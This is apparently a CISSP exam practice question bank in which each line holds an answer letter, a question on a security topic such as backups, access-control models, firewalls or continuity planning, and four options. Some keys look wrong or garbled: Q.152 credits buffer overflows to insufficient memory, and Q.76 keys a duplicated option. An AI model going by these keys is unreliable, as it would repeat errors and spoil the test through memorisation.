C#CISSP3 Q.17:  Which of the following backup methods is most appropriate for off-site archiving?  	^A: Incremental backup method.	^B: Off-site backup method.	^C: Full backup method.	^D: Differential backup method.
C#CISSP3 Q.18:  Which of the following is not a weakness of symmetric cryptography?  	^A: Limited security	^B: Key distribution	^C: Speed	^D: Scalability
B#CISSP3 Q.19:  Which of the following is not a defined layer in the TCP/IP protocol model?  	^A: Application layer	^B: Session layer	^C: Internet layer	^D: Network access layer
A#CISSP3 Q.20:  Rewritable and erasable (CDR/W) optical disk are sometimes used for backups that require short time storage for changeable data, but require?  	^A: Faster file access than tape.	^B: Slower file access than tape.	^C: Slower file access than drive.	^D: Slower file access than scale.
B#CISSP3 Q.21:  Which one of the following is not a primary component or aspect of firewall systems?  	^A: Protocol filtering	^B: Packet switching	^C: Rule enforcement engine	^D: Extended logging capability
C#CISSP3 Q.22:  What are database views used for?  	^A: To ensure referential integrity.	^B: To allow easier access to data in a database.	^C: To restrict user access to data in a database.	^D: To provide audit trails.
B#CISSP3 Q.23:  Which of the following Common Data Network Services is used to send and receive email internally or externally through an email gateway device?  	^A: File services	^B: Mail services	^C: Print services	^D: Client/Server services
D#CISSP3 Q.24:  Intrusion detection has which of the following sets of characteristics.  	^A: It is adaptive rather than preventive.	^B: It is administrative rather than preventive.	^C: It is disruptive rather than preventative.	^D: It is detective rather than preventative.
A#CISSP3 Q.25:  The type of password that provides maximum security, because a new password is required for each new log-on, is referred to as?  	^A: One-time or dynamic password	^B: Cognitive password	^C: Static password	^D: Pass phrase
B#CISSP3 Q.26:  Devices in the form of credit card-size memory cards or smart cards, or those resembling small calculators, that are used to supply static and dynamic passwords are called?	^A: Token Ring	^B: Tokens	^C: Token passing networks	^D: Coupons
A#CISSP3 Q.27:  Which of the following uses a directed graph to specify the rights that a subject can transfer to an object, or that a subject can take from another subject?	^A: Take-Grant model	^B: Access Matrix model	^C: Biba model	^D: Bell-Lapadula model			
D#CISSP3 Q.28:  Which of the following is the BEST way to prevent software license violations?	^A: Implementing a corporate policy on copyright infringements and software use. ^B: Requiring that all PCs be diskless workstations. ^C: Installing metering software on the LAN so applications can be accessed through the metered software.	^D: Regularly scanning used PCs to ensure that unauthorized copies of software have not been loaded on the PC.			
A#CISSP3 Q.29:  Zip/Jaz drives, SyQuest, and Bernoulli boxes are very transportable and are often the standard for?	^A: Data exchange in many businesses.	^B: Data change in many businesses.	^C: Data compression in many businesses.	^D: Data interchange in many businesses.
D#CISSP3 Q.30:  What are two types of system assurance?	^A: Operational Assurance and Architecture Assurance.	^B: Design Assurance and Implementation Assurance.	^C: Architecture Assurance and Implementation Assurance.	^D: Operational Assurance and Life-Cycle Assurance.			
A#CISSP3 Q.31:  Why does compiled code pose more risk than interpreted code?	^A: Because malicious code can be embedded in the compiled code and can be difficult to detect.	^B: Because the browser can safely execute all interpreted applets.	^C: Because compilers are not reliable.	^D: It does not. Interpreted code poses more risk than compiled code.			
C#CISSP3 Q.32:  Which model, based on the premise that the quality of a software product is a direct function of the quality of its associated software development and maintenance processes, introduced five levels with which the maturity of an organization involved in the software process is evaluated?	^A: The Total Quality Model (TQM)	^B: The IDEAL Model	^C: The Software Capability Maturity Model	^D: The Spiral Model
A#CISSP3 Q.33:  Phreakers are hackers who specialize in telephone fraud. What type of telephone fraud simulates the tones of coins being deposited into a payphone?  	^A: Red Boxes	^B: Blue Boxes	^C: White Boxes	^D: Black Boxes
C#CISSP3 Q.34:  What is the proper term to refer to a single unit of Ethernet data?	^A: Ethernet segment	^B: Ethernet datagram	^C: Ethernet frame	^D: Ethernet packet
A#CISSP3 Q.35:  Which of the following represents an ALE calculation?	^A: Single loss expectancy x annualized rate of occurrence.	^B: Gross loss expectancy x loss frequency.	^C: Actual replacement cost - proceeds of salvage.	^D: Asset value x loss expectancy.
A#CISSP3 Q.36:  If an operating system permits executable objects to be used simultaneously by multiple users without a refresh of the objects, what security problem is most likely to exist?	^A: Disclosure of residual data.	^B: Unauthorized obtaining of a privileged execution state.	^C: Data leakage through covert channels.	^D: Denial of service through a deadly embrace.
A#CISSP3 Q.37:  Tape arrays use a large device with multiple (sometimes 32 or 64) tapes that are configured as a?	^A: Single array	^B: Dual array	^C: Triple array	^D: Quadruple array			
D#CISSP3 Q.38:  Why would anomaly detection IDSs often generate a large number of false positives?	^A: Because they can only identify correctly attacks they already know about.	^B: Because they are application-based and are more subject to attacks.	^C: Because they can't identify abnormal behavior.	^D: Because normal patterns of user and system behavior can vary wildly.
C#CISSP3 Q.39:  According to private sector data classification levels, how would salary levels and medical information be classified?  	^A: Public	^B: Sensitive	^C: Private	^D: Confidential
B#CISSP3 Q.40:  Which of the following is used in database information security to hide information?  	^A: Inheritance	^B: Polyinstantiation	^C: Polymorphism	^D: Delegation
A#CISSP3 Q.41:  Which of the following evaluates the product against the specification?  	^A: Verification	^B: Validation	^C: Concurrence	^D: Accuracy
D#CISSP3 Q.42:  Application Level Firewalls are commonly a host computer running proxy server software, which makes a?  	^A: Proxy Client	^B: Proxy Session	^C: Proxy System	^D: Proxy Server
B#CISSP3 Q.43:  What attack involves the perpetrator sending spoofed packet(s) with the SYN flag set to the victim's machine on any open port that is listening?	^A: Bonk attack	^B: Land attack	^C: Teardrop attack	^D: Smurf attack
A#CISSP3 Q.44:  The beginning and the end of each transfer during asynchronous communication data transfer are marked by?  	^A: Start and Stop bits.	^B: Start and End bits.	^C: Begin and Stop bits.	^D: Start and Finish bits.
A#CISSP3 Q.45:  Most of unplanned downtime of information systems is attributed to which of the following?  	^A: Hardware failure	^B: Natural disaster	^C: Human error	^D: Software failure
A#CISSP3 Q.46:  RAID that functions as part of the operating system on the file server is a?  	^A: Software implementation	^B: Hardware implementation	^C: Network implementation	^D: Netware implementation
C#CISSP3 Q.47:  During which phase of an IT system life cycle are security requirements developed?  	^A: Operation	^B: Initiation	^C: Development	^D: Implementation
B#CISSP3 Q.48:  Ensuring that printed reports reach proper users and that receipts are signed before releasing sensitive documents are examples of?  	^A: Deterrent controls	^B: Output controls	^C: Information flow controls	^D: Asset controls
B#CISSP3 Q.49:  Non-Discretionary Access Control. A central authority determines what subjects can have access to certain objects based on the organizational security policy. The access controls may be based on?  	^A: The society's role in the organization.	^B: The individual's role in the organization.	^C: The group-dynamics as they relate to the individual's role in the organization.	^D: The group-dynamics as they relate to the master-slave role in the organization.
B#CISSP3 Q.50:  An effective information security policy should not have which of the following characteristics?  	^A: Include separation of duties.	^B: Be designed with a short-to mid-term focus.	^C: Be understandable and supported by all stakeholders.	^D: Specify areas of responsibility and authority.
B#CISSP3 Q.51:  Which of the following statements pertaining to secure information processing facilities is incorrect?  	^A: Walls should have an acceptable fire rating.	^B: Windows should be protected by bars.	^C: Doors must resist forcible entry.	^D: Location and type of fire suppression systems should be known.
D#CISSP3 Q.52:  Making sure that the data is accessible when and where it is needed is which of the following?  	^A: Confidentiality	^B: Integrity	^C: Acceptability	^D: Availability
B#CISSP3 Q.53:  Business continuity plan development depends most on?  	^A: Directives of Senior Management	^B: Business Impact Analysis (BIA)	^C: Scope and Plan Initiation	^D: Skills of BCP committee
D#CISSP3 Q.54:  Which layer defines the X.25, V.35, X.21 and HSSI standard interfaces?	^A: Transport layer	^B: Network layer	^C: Data link layer	^D: Physical layer
D#CISSP3 Q.55:  Related to information security, availability is the opposite of which of the following?  	^A: Delegation	^B: Distribution	^C: Documentation	^D: Destruction
A#CISSP3 Q.56:  Which of the following is a disadvantage of a behavior-based ID system?  	^A: The activity and behavior of the users while in the networked system may not be static enough to effectively implement a behavior-based ID system.	^B: The activity and behavior of the users while in the networked system may be dynamic enough to effectively implement a behavior-based ID system.	^C: The activity and behavior of the users while in the networked system may not be dynamic enough to effectively implement a behavior-based ID system.	^D: The system is characterized by high false negative rates where intrusions are missed.
C#CISSP3 Q.57:  Which of the following statements pertaining to VPN protocol standards is false?  	^A: L2TP is a combination of PPTP and L2F.	^B: L2TP and PPTP were designed for single point-to-point client to server communication.	^C: L2TP operates at the network layer.	^D: PPTP uses native PPP authentication and encryption services.
C#CISSP3 Q.58:  What is the most critical characteristic of a biometric identifying system?  	^A: Perceived intrusiveness	^B: Storage requirements	^C: Accuracy	^D: Reliability
A#CISSP3 Q.59:  RAID Software can run faster in the operating system because neither use the hardware-level parity drives by?  	^A: Simple striping or mirroring.	^B: Hard striping or mirroring.	^C: Simple hamming code parity or mirroring.	^D: Simple striping or hamming code parity.
A#CISSP3 Q.60:  The guarantee that the message sent is the message received, and that the message was not intentionally or unintentionally altered is?  	^A: Integrity	^B: Confidentiality	^C: Availability	^D: Identity
B#CISSP3 Q.61:  Which of the following is a preventive control?  	^A: Motion detectors	^B: Guard dogs	^C: Audit logs	^D: Intrusion detection systems
B#CISSP3 Q.62:  What uses a key of the same length as the message?  	^A: Running key cipher	^B: One-time pad	^C: Steganography	^D: Cipher block chaining
A#CISSP3 Q.63:  Which of the following protocols operates at the session layer (layer 5)?  	^A: RPC	^B: IGMP	^C: LDP	^D: SPX
B#CISSP3 Q.64:  Which of the following is NOT a countermeasure to traffic analysis?  	^A: Padding messages	^B: Eavesdropping	^C: Sending noise	^D: Covert channel analysis
C#CISSP3 Q.65:  Which of the following layers of the ISO/OSI model do packet filtering firewalls operate at? 	^A: Application layer	^B: Session layer	^C: Network layer	^D: Presentation layer
C#CISSP3 Q.66:  A prolonged high voltage is?  	^A: Spike	^B: Blackout	^C: Surge ^D: Fault
D#CISSP3 Q.67:  How do the Information Labels of Compartmented Mode Workstation differ from the Sensitivity Levels of B3 evaluated systems?  	^A: Information Labels in CMW are homologous to Sensitivity Labels, but a different term was chosen to emphasize that CMWs are not described in the Orange Book.	^B: Information Labels contain more information than Sensitivity Labels, thus allowing more granular access decisions to be made.	^C: Sensitivity Labels contain more information than Information Labels because B3+ systems should store more sensitive data than workstations.	^D: Information Labels contain more information than Sensitivity Labels, but are not used by the Reference Monitor to determine access permissions.
A#CISSP3 Q.68:  In what security mode can a system be operating if all users have the clearance or authorization and need-to-know to all data processed within the system?  	^A: Dedicated security mode.	^B: System-high security mode.	^C: Compartmented security mode.	^D: Multilevel security mode.
D#CISSP3 Q.69:  What are the three conditions that must be met by the reference monitor?	^A: Confidentiality, availability and integrity.	^B: Policy, mechanism and assurance.	^C: Isolation, layering and abstraction.	^D: Isolation, completeness and verifiability.
B#CISSP3 Q.70:  While referring to Physical Security, what does positive pressurization mean?  	^A: The pressure inside your sprinkler system is greater than zero.	^B: The air goes out of a room when a door is opened and outside air does not go into the room.	^C: Causes the sprinkler system to go off.	^D: A series of measures that increase pressure on employees in order to make them more productive.
C#CISSP3 Q.71:  The baseline sets certain thresholds for specific errors or mistakes allowed and the amount of these occurrences that can take place before it is considered suspicious?  	^A: Checkpoint level	^B: Ceiling level	^C: Clipping level	^D: Threshold level
B#CISSP3 Q.72:  The most prevalent cause of computer center fires is which of the following?  	^A: AC equipment	^B: Electrical distribution systems.	^C: Heating systems	^D: Natural causes
C#CISSP3 Q.73:  An offsite backup facility intended to operate an information processing facility, having no computer or communications equipment, but having flooring, electrical wiring, air conditioning, etc., is better known as a?  	^A: Hot site	^B: Duplicate processing facility	^C: Cold site	^D: Warm site
C#CISSP3 Q.74:  Which of the following are necessary components of a Multi-Level Security Policy?  	^A: Sensitivity Labels and a system high evaluation.	^B: Sensitivity Labels and Discretionary Access Control.	^C: Sensitivity Labels and Mandatory Access Control.	^D: Object Labels and a system high evaluation.
A#CISSP3 Q.75:  Which of the following, used to extend a network, has a storage capacity to store frames and act as a store-and-forward device?  	^A: Bridge	^B: Router	^C: Repeater	^D: Gateway
D#CISSP3 Q.76:  Which of the following is addressed by Kerberos?  	^A: Confidentiality and integrity.	^B: Authorization and authentication.	^C: Validation and integrity.	^D: Confidentiality and integrity.
A#CISSP3 Q.77:  Access Control techniques do not include which of the following choices?	^A: Relevant Access Controls	^B: Discretionary Access Control	^C: Mandatory Access Control	^D: Lattice Based Access Control
D#CISSP3 Q.78:  Why is public key cryptography recommended for use in the process of securing facsimiles during transmission?  	^A: Keys are never transmitted over the network.	^B: Data compression decreases key change frequency.	^C: Key data is not recognizable from facsimile data.	^D: The key is securely passed to the receiving machine.
A#CISSP3 Q.79:  Database views are not used to:  	^A: Implement referential integrity.	^B: Implement least privilege.	^C: To implement content-dependent access restrictions.	^D: Implement need-to-know.
B#CISSP3 Q.80:  Which of the following is most concerned with personnel security?  	^A: Management controls	^B: Operational controls	^C: Technical controls	^D: Human resources controls.
A#CISSP3 Q.81:  Which of the following statements pertaining to the Trusted Computer System Evaluation Criteria (TCSEC) is incorrect?  	^A: With TCSEC, functionality and assurance are evaluated separately.	^B: TCSEC provides a means to evaluate the trustworthiness of an information system.	^C: The Orange book does not cover networks and communications.	^D: Data base management systems are not covered by the TCSEC.
B#CISSP3 Q.82:  Which of the following could illegally capture network user passwords?	^A: Data diddling	^B: Sniffing	^C: Spoofing	^D: Smurfing			
A#CISSP3 Q.83:  Which trusted facility management concept implies that two operators must review and approve the work of each other?	^A: Two-man control	^B: Dual control	^C: Double control	^D: Segregation control			
B#CISSP3 Q.84:  There are more than 20 books in the Rainbow Series. Which of the following covers password management guidelines?	^A: Orange Book	^B: Green Book	^C: Red Book	^D: Lavender Book
D#CISSP3 Q.85:  Which of the following is an IP address that is private (i.e. reserved for internal networks, and not a valid address to use on the Internet)?  	^A: 172.5.42.5	^B: 172.76.42.5	^C: 172.90.42.5	^D: 172.16.42.5
C#CISSP3 Q.86:  How fast is private key cryptography compared to public key cryptography?  	^A: 10 to 100 times faster.	^B: 100 to 1000 times faster.	^C: 1000 to 10000 times faster	^D: 10000 to 20000 times faster.
C#CISSP3 Q.87:  The continual effort of making sure that the correct policies, procedures and standards are in place and being followed is described as what?	^A: Due care	^B: Due concern	^C: Due diligence	^D: Due practice			
A#CISSP3 Q.88:  Which tape format type is mostly used for home/small office backups?	^A: Quarter Inch Cartridge drives (QIC)	^B: Digital Linear Tapes (DLT)	^C: 8mm tape	^D: Digital Audio Tape (DAT)			
C#CISSP3 Q.89:  In an organization, an Information Technology security function should:	^A: Be a function within the information systems function of an organization.	^B: Report directly to a specialized business unit such as legal, corporate security or insurance.	^C: Be led by a Chief Security Officer and report directly to the CEO.	^D: Be independent but report to the Information Systems function.
C#CISSP3 Q.90:  Who of the following is responsible for ensuring that proper controls are in place to address integrity, confidentiality, and availability of IT systems and data?	^A: Business and functional managers.	^B: IT Security practitioners.	^C: System and information owners.	^D: Chief information officer
A#CISSP3 Q.91:  The act of requiring two of the three factors to be used in the authentication process refers to?  	^A: Two-Factor Authentication	^B: One-Factor Authentication	^C: Bi-Factor Authentication	^D: Double Authentication
A#CISSP3 Q.92:  This type of backup management provides a continuous on-line backup by using optical or tape jukeboxes, similar to WORMs, (Write Once, Read Many)  	^A: Hierarchical Storage Management (HSM).	^B: Hierarchical Resource Management (HRM).	^C: Hierarchical Access Management (HAM).	^D: Hierarchical Instance Management (HIM).
D#CISSP3 Q.93:  Which of the following elements is not included in a Public Key Infrastructure (PKI)?  	^A: Timestamping	^B: Lightweight Directory Access Protocol (LDAP)	^C: Certificate revocation	^D: Internet Key Exchange (IKE)
B#CISSP3 Q.94:  Which of the following best corresponds to the type of memory addressing where the address location that is specified in the program instruction contains the address of the final desired location?  	^A: Direct addressing	^B: Indirect addressing	^C: Indexed addressing	^D: Program addressing
B#CISSP3 Q.95:  Creation and maintenance of intrusion detection systems and processes for the following is one of them identify it:  	^A: Event nonrepudiation	^B: Event notification	^C: Netware monitoring	^D: Guest access
A#CISSP3 Q.96:  Which of the following is true related to network sniffing?	^A: Sniffers allow an attacker to monitor data passing across a network.	^B: Sniffers alter the source address of a computer to disguise and exploit weak authentication methods.	^C: Sniffers take over network connections.	^D: Sniffers send IP fragments to a system that overlap with each other.
A#CISSP3 Q.97:  Which of the following protocols is not implemented at the Internet layer of the TCP/IP protocol model?  	^A: User datagram protocol (UDP)	^B: Internet protocol (IP)	^C: Address resolution protocol (ARP)	^D: Internet control message protocol (ICMP)
B#CISSP3 Q.98:  Which of the following is used to help business units understand the impact of a disruptive event?  	^A: A risk analysis.	^B: A business impact assessment.	^C: A vulnerability assessment.	^D: A disaster recovery plan.
B#CISSP3 Q.99:  A contingency plan should address?  	^A: Potential risks	^B: Residual risks	^C: Identified risks	^D: All of the above
A#CISSP3 Q.100:  In the OSI/ISO model, at what level is SET (SECURE ELECTRONIC TRANSACTION PROTOCOL) provided?  	^A: Application	^B: Network	^C: Presentation	^D: Session
A#CISSP3 Q.101:  A packet filtering firewall looks at the data packet to get information about the source and destination addresses of an incoming packet, the session's communications protocol (TCP, UDP or ICMP), and the source destination application port for the?  	^A: Desired service	^B: Dedicated service	^C: Delayed service	^D: Distributed service.
A#CISSP3 Q.102:  Packet Filtering Firewalls system is considered a?  	^A: First generation firewall.	^B: Second generation firewall.	^C: Third generation firewall.	^D: Fourth generation firewall.
D#CISSP3 Q.103:  When should a post-mortem review meeting be held after an intrusion has been properly taken care of?  	^A: Within the first three months after the investigation of the intrusion is completed.	^B: Within the first week after prosecution of intruders has taken place, whether successful or not.	^C: Within the first month after the investigation of the intrusion is completed.	^D: Within the first week of completing the investigation of the intrusion.
A#CISSP3 Q.104:  Which of the following can be used as a covert channel?  	^A: Storage and timing.	^B: Storage and low bits.	^C: Storage and permissions.	^D: Storage and classification.			
C#CISSP3 Q.105:  Which software development model is actually a meta-model that incorporates a number of the software development models?	^A: The Waterfall model.	^B: The modified Waterfall model.	^C: The Spiral model.	^D: The Critical Patch Model (CPM).			
B#CISSP3 Q.106:  What is not true with pre-shared key authentication within IKE / IPsec protocol:	^A: Pre-shared key authentication is normally based on simple passwords.	^B: Needs a PKI to work.	^C: Only one preshared key for all VPN connections is needed.	^D: Costly key management on large user groups.
C#CISSP3 Q.108:  In order to ensure the privacy and integrity of the data, connections between firewalls over public networks should use?  	^A: Screened subnets	^B: Digital certificates	^C: Encrypted Virtual Private Networks 	^D: Encryption
D#CISSP3 Q.109:  What is necessary for a subject to have write access to an object in a Multi-Level Security Policy?  	^A: The subject's sensitivity label must dominate the object's sensitivity label. ^B: The subject's sensitivity label subordinates the object's sensitivity label. ^C: The subject's sensitivity label is subordinated by the object's sensitivity label. ^D: The subject's sensitivity label is dominated by the object's sensitivity label.
B#CISSP3 Q.110:  What best describes a scenario when an employee has been shaving off pennies from multiple accounts and depositing the funds into his own bank account?   ^A: Data fiddling ^B: Data diddling ^C: Data hiding ^D: Data masking
A#CISSP3 Q.111:  Which of the following is unlike the other three?   ^A: El Gamal ^B: Teardrop ^C: Buffer Overflow ^D: Smurf
D#CISSP3 Q.112:  Phreakers are hackers who specialize in telephone fraud. What type of telephone fraud manipulates the line voltage to receive a toll-free call?   ^A: Red Boxes ^B: Blue Boxes ^C: White Boxes ^D: Black Boxes
D#CISSP3 Q.113:  Which of the following groups represents the leading source of computer crime losses?   ^A: Hackers ^B: Industrial saboteurs ^C: Foreign intelligence officers ^D: Employees
A#CISSP3 Q.114:  Which of the following steps should be performed first in a business impact analysis (BIA)?   ^A: Identify all business units within the organization. ^B: Evaluate the impact of disruptive events. ^C: Estimate the Recovery Time Objectives (RTO). ^D: Evaluate the criticality of business functions.
C#CISSP3 Q.115:  Which of the following embodies all the detailed actions that personnel are required to follow?   ^A: Standards ^B: Guidelines ^C: Procedures ^D: Baselines
D#CISSP3 Q.116:  Immune to the effects of electromagnetic interference (EMI) and therefore has a much longer effective usable length (up to two kilometers in some cases) is?   ^A: Coaxial cable ^B: Twisted Pair cable ^C: Axial cable ^D: Fiber Optic cable
A#CISSP3 Q.117:  Which of the following is the most reliable, secure means of removing data from magnetic storage media such as a magnetic tape, or cassette?   ^A: Degaussing ^B: Parity Bit Manipulation ^C: Certification ^D: Buffer overflow
A#CISSP3 Q.118:  Which of the following is an advantage of prototyping?   ^A: Prototype systems can provide significant time and cost savings. ^B: Change control is often less complicated with prototype systems. ^C: It ensures that functions or extras are not added to the intended system. ^D: Strong internal controls are easier to implement.
A#CISSP3 Q.119:  The IS security analyst's participation in which of the following system development life cycle phases provides maximum benefit to the organization?   ^A: System requirements definition. ^B: System design. ^C: Program development. ^D: Program testing.
C#CISSP3 Q.120:  Controls are implemented to?   ^A: Eliminate risk and reduce the potential for loss. ^B: Mitigate risk and eliminate the potential for loss. ^C: Mitigate risk and reduce the potential for loss. ^D: Eliminate risk and eliminate the potential for loss.
A#CISSP3 Q.121:  A circuit level gateway is ________ when compared to an application level firewall.   ^A: Easier to maintain. ^B: More difficult to maintain. ^C: More secure. ^D: Slower
C#CISSP3 Q.122:  In IPSec, if the communication mode is gateway-gateway or host-gateway:   ^A: Only tunnel mode can be used. ^B: Only transport mode can be used. ^C: Encapsulating Security Payload (ESP) authentication must be used.	^D: Both tunnel and transport mode can be used.
C#CISSP3 Q.123:  Which integrity model defines a constrained data item, an integrity verification procedure and a transformation procedure?  	^A: The Take-Grant model	^B: The Biba integrity model	^C: The Clark Wilson integrity model	^D: The Bell-LaPadula integrity model
A#CISSP3 Q.124:  Which of the following rules pertaining to a Business Continuity Plan/Disaster Recovery Plan is incorrect?  	^A: In order to facilitate recovery, a single plan should cover all locations.	^B: There should be requirements to form a committee to decide a course of action. These decisions should be made ahead of time and incorporated into the plan.	^C: In its procedures and tasks, the plan should refer to functions, not specific individuals.	^D: Critical vendors should be contacted ahead of time to validate equipment can be obtained in a timely manner.
C#CISSP3 Q.125:  What are suitable protocols for securing VPN connections?  	^A: S/MIME and SSH	^B: TLS and SSL	^C: IPsec and L2TP	^D: PKCS and X.509
D#CISSP3 Q.126:  Which of the following questions is less likely to help in assessing identification and authentication controls?  	^A: Is a current list maintained and approved of authorized users and their access?	^B: Are passwords changed at least every ninety days or earlier if needed?	^C: Are inactive user identifications disabled after a specified period of time?	^D: Is there a process for reporting incidents?
B#CISSP3 Q.127:  The primary purpose for using one-way encryption of user passwords within a system is which of the following?  	^A: It prevents an unauthorized person from trying multiple passwords in one logon attempt.	^B: It prevents an unauthorized person from reading or modifying the password list.	^C: It minimizes the amount of storage required for user passwords.	^D: It minimizes the amount of processing time used for encrypting passwords.
D#CISSP3 Q.128:  The security of a computer application is most effective and economical in which of the following cases?  	^A: The system is optimized prior to the addition of security.	^B: The system is procured off-the-shelf.	^C: The system is customized to meet the specific security threat.	^D: The system is designed originally to provide the necessary security.
D#CISSP3 Q.129:  Which of the following choices is a typical biometric characteristic that is not used to uniquely authenticate an individual's identity?  	^A: Retina scans	^B: Iris scans	^C: Palm scans	^D: Skin scans
A#CISSP3 Q.130:  Which of the following proves or disproves a specific act through oral testimony based on information gathered through the witness's five senses?  	^A: Direct evidence	^B: Circumstantial evidence	^C: Conclusive evidence	^D: Corroborative evidence
B#CISSP3 Q.131:  Which of the following would be defined as an absence of safeguard that could be exploited?  	^A: A threat	^B: A vulnerability	^C: A risk	^D: An exposure
D#CISSP3 Q.132:  Which of the following is a LAN transmission protocol?  	^A: Ethernet	^B: Ring topology	^C: Unicast	^D: Polling
B#CISSP3 Q.133:  Why would a database be denormalized?	^A: To ensure data integrity.	^B: To increase processing efficiency.	^C: To prevent duplication of data.	^D: To save storage space.
C#CISSP3 Q.134:  Under Named Perils form of Property insurance  	^A: Burden of proof that particular loss is covered is on Insurer.	^B: Burden of proof that particular loss is not covered is on Insurer.	^C: Burden of proof that particular loss is covered is on Insured.	^D: Burden of proof that particular loss is not covered is on Insured.
C#CISSP3 Q.135:  The following is not true:	^A: Since the early days of mankind humans have struggled with the problems of protecting assets.	^B: The addition of a PIN keypad to the card reader was a solution to unreported card or lost card problem.	^C: There has never been a problem of lost keys.	^D: Human guard is an inefficient and sometimes ineffective method of protecting resources.
C#CISSP3 Q.136:  Which of the following statements pertaining to software testing approaches is correct?  	^A: A bottom-up approach allows interface errors to be detected earlier.	^B: A top-down approach allows errors in critical modules to be detected earlier.	^C: The test plan and results should be retained as part of the system's permanent documentation.	^D: Black box testing is predicated on a close examination of procedural detail.
C#CISSP3 Q.137:  Which Orange Book evaluation level is described as Structured Protection?  	^A: A1	^B: B3	^C: B2	^D: B1
C#CISSP3 Q.138:  Which of the following questions should any user not be able to answer regarding their organization information security policy?  	^A: Who is involved in establishing the security policy?	^B: Where is the organization security policy defined?	^C: What are the actions that need to be performed in case of a disaster?	^D: Who is responsible for monitoring compliance to the organization security policy?
A#CISSP3 Q.139:  RAID Level 1 mirrors the data from one disk to set of disks using which of the following techniques?	^A: Copying the data onto another disk or set of disks.^B: Moving the data onto another disk or set of disks.	^C: Establishing dual connectivity to another disk or set of disks.	^D: Establishing dual addressing to another disk or set of disks.
A#CISSP3 Q.140:  Which type of firewall can be used to track connectionless protocols such as UDP and RPC?  	^A: Stateful inspection firewalls	^B: Packet filtering firewalls	^C: Application level firewalls	^D: Circuit level firewalls
C#CISSP3 Q.141:  Which of the following items should not be retained in an E-mail directory?  	^A: Drafts of documents.	^B: Copies of documents.	^C: Permanent records.	^D: Temporary documents.
C#CISSP3 Q.142:  Which of the following department managers would be best suited to oversee the development of an information security policy?  ^A: Information systems	^B: Human resources	^C: Business operations	^D: Security administration
B#CISSP3 Q.143:  Which of the following countermeasures is not appropriate for war dialing attacks?  	^A: Monitoring and auditing for such activity.	^B: Disabling call forwarding.	^C: Making sure only necessary phone numbers are made public.	^D: Using completely different numbers for voice and data accesses.
B#CISSP3 Q.144:  Which of the following tools is less likely to be used by a hacker?	^A: L0phtCrack	^B: Tripwire	^C: Crack	^D: John the Ripper
A#CISSP3 Q.145:  Which of the following logical access exposures involves changing data before, or as it is entered into the computer?  	^A: Data diddling	^B: Salami techniques	^C: Trojan horses	^D: Viruses
B#CISSP3 Q.146:  Which of the following computer aided software engineering (CASE) products is used for developing detailed designs, such as screen and report layouts?  	^A: Lower CASE	^B: Middle CASE	^C: Upper CASE	^D: I-CASE
C#CISSP3 Q.147:  What is called the number of columns in a table?  	^A: Schema	^B: Relation	^C: Degree	^D: Cardinality
B#CISSP3 Q.148:  Which of the following is the most reliable authentication device?  	^A: Variable callback system	^B: Smart Card system	^C: Fixed callback system	^D: Combination of variable and fixed callback system.
C#CISSP3 Q.149:  Which of the following firewall rules is less likely to be found on a firewall installed between an organization's internal network and the Internet?	^A: Permit all traffic to and from local host.	^B: Permit all inbound ssh traffic	^C: Permit all inbound tcp connections.	^D: Permit all syslog traffic to log-server.abc.org.
B#CISSP3 Q.150:  The Internet can be utilized by either?  	^A: Public or private networks (with a Virtual Private Networks).	^B: Private or public networks (with a Virtual Private Networks).	^C: Home or private networks (with a Virtual Private Networks).	^D: Public or home networks (with a Virtual Private Networks).
A#CISSP3 Q.151:  This backup method must be made regardless of whether Differential or Incremental methods are used. 	^A: Full Backup Method	^B: Incremental backup method	^C: Differential backup method	^D: Tape backup method
D#CISSP3 Q.152:  Why do buffer overflows happen? 	^A: Because buffers can only hold so much data.	^B: Because input data is not checked for appropriate length at time of input.	^C: Because they are an easy weakness to exploit.	^D: Because of insufficient system memory.
C#CISSP3 Q.153:  Which of the following should not be performed by an operator?  	^A: Mounting disk or tape	^B: Backup and recovery	^C: Data entry	^D: Handling hardware
C#CISSP3 Q.154:  What security model is dependent on security labels?  	^A: Discretionary access control	^B: Label-based access control	^C: Mandatory access control	^D: Non-discretionary access control
A#CISSP3 Q.155:  Detection capabilities of Host-based ID systems are limited by the incompleteness of which of the following?  	^A: Audit log capabilities	^B: Event capture capabilities	^C: Event triage capabilities	^D: Audit notification capabilities
B#CISSP3 Q.156:  Computer crime is generally made possible by which of the following?  	^A: The perpetrator obtaining training & special knowledge.	^B: Victim carelessness.	^C: Collusion with others in information processing	^D: System design flaws.
A#CISSP3 Q.157:  The structures, transmission methods, transport formats, and security measures that are used to provide integrity, availability, authentication, and confidentiality for transmissions over private and public communications networks and media includes?  	^A: The Telecommunications and Network Security domain.	^B: The Telecommunications and Netware Security domain.	^C: The Technical communications and Network Security domain.	^D: The Telnet and Network Security domain.
A#CISSP3 Q.158:  Which of the following is the lowest TCSEC class wherein the system must be protected against covert storage channels (but not necessarily covert timing channels)?	^A: B2	^B: B1	^C: B3	^D: A1
C#CISSP3 Q.159:  Which type of control is concerned with avoiding occurrences of risks?  	^A: Deterrent controls	^B: Detective controls	^C: Preventive controls	^D: Compensating controls
A#CISSP3 Q.160:  The basic function of an FRDS is to?  	^A: Protect file servers from data loss and a loss of availability due to disk failure.	^B: Persistent file servers from data gain and a gain of availability due to disk failure.	^C: Prudent file servers from data loss and a loss of acceptability due to disk failure.	^D: Packet file servers from data loss and a loss of accountability due to disk failure.
D#CISSP3 Q.161:  Which of the following protocols does not operate at the data link layer (layer 2)?  	^A: PPP	^B: RARP	^C: L2F	^D: ICMP
A#CISSP3 Q.162:  This tape format can be used to backup data systems in addition to its original intended audio used by:  	^A: Digital Audio tape (DAT)	^B: Digital video tape (DVT)	^C: Digital Casio Tape (DCT)	^D: Digital Voice Tape (DVT)
C#CISSP3 Q.163:  By examining the state and context of the incoming data packets, it helps to track the protocols that are considered connectionless, such as UDP-based applications and Remote Procedure Calls (RPC). This type of firewall system is used in?  	^A: First generation firewall systems.	^B: Second generation firewall systems.	^C: Third generation firewall systems.	^D: Fourth generation firewall systems.
A#CISSP3 Q.164:  Guards are appropriate whenever the function required by the security program involves which of the following?	^A: The use of discriminating judgment.^B: The use of physical force.	^C: The operation of access control devices.	^D: The need to detect unauthorized access.
A#CISSP3 Q.165:  A server cluster looks like a?  	^A: Single server from the user's point of view.	^B: Dual server from the user's point of view.	^C: Triple server from the user's point of view.	^D: Quardle server from the user's point of view.
D#CISSP3 Q.166:  Which of the following are functions that are compatible in a properly segregated environment?	^A: Application programming and computer operation.	^B: System programming and job control analysis.	^C: Access authorization and database administration.	^D: System development and systems maintenance.
